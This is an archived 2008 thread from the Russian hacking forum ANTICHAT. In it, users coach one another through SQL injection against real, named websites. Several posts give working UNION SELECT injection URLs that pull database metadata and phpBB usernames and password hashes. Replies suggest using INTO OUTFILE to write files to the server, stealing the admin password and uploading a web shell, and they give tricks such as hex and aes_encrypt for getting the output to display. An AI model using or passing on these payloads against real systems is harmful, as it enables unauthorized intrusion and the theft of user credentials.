ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.08.2008, 13:50
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
может кто показать , как заливают фаил через load_file() в скл инъекции .
|
|
|
12.08.2008, 13:56
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
Последний раз редактировалось Red_Red1; 12.08.2008 в 13:58..
Причина: Уточнение
|
|
|
|
12.08.2008, 14:29
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
Сообщение от Red_Red1
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
спасибо , почитаю.
А ИМЯ_ФАЙЛА(путь) на моем компе , или на его? и заливается , то куда?
|
|
|
|
12.08.2008, 14:58
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от Calcutta
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
тут 4 версия мы можем только подобрать таблицы. information_schema.tables есть только в 5 версии и выше
|
|
|
|
12.08.2008, 15:18
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
Сообщение от nicusor
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье 
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+s elect+1,2,3,4,username,user_password,7,8,9+from+ph pbb_users/* но почемут не видно данных базы.
|
|
|
|
12.08.2008, 15:30
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
скорей сего шифрование _ пробывал с декриптом ваще ошибка(
|
|
|
|
12.08.2008, 15:34
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от superboys
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+s elect+1,2,3,4,username,user_password,7,8,9+from+ph pbb_users/* но почемут не видно данных базы.
hex, aes_encrypt
|
|
|
|
12.08.2008, 15:38
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Юзай лимит Х,Х
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+s elect+1,2,3,4,username,user_password,7,8,9+from+ph pbb_users+limit+1,1/*
|
|
|
|
12.08.2008, 15:39
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
да хоть бы показал синтаксис)
|
|
|
|
12.08.2008, 15:40
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
спс Ред_Ред1
|
|
|
|
|
|
|
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|
Похожие темы
Линейный вид
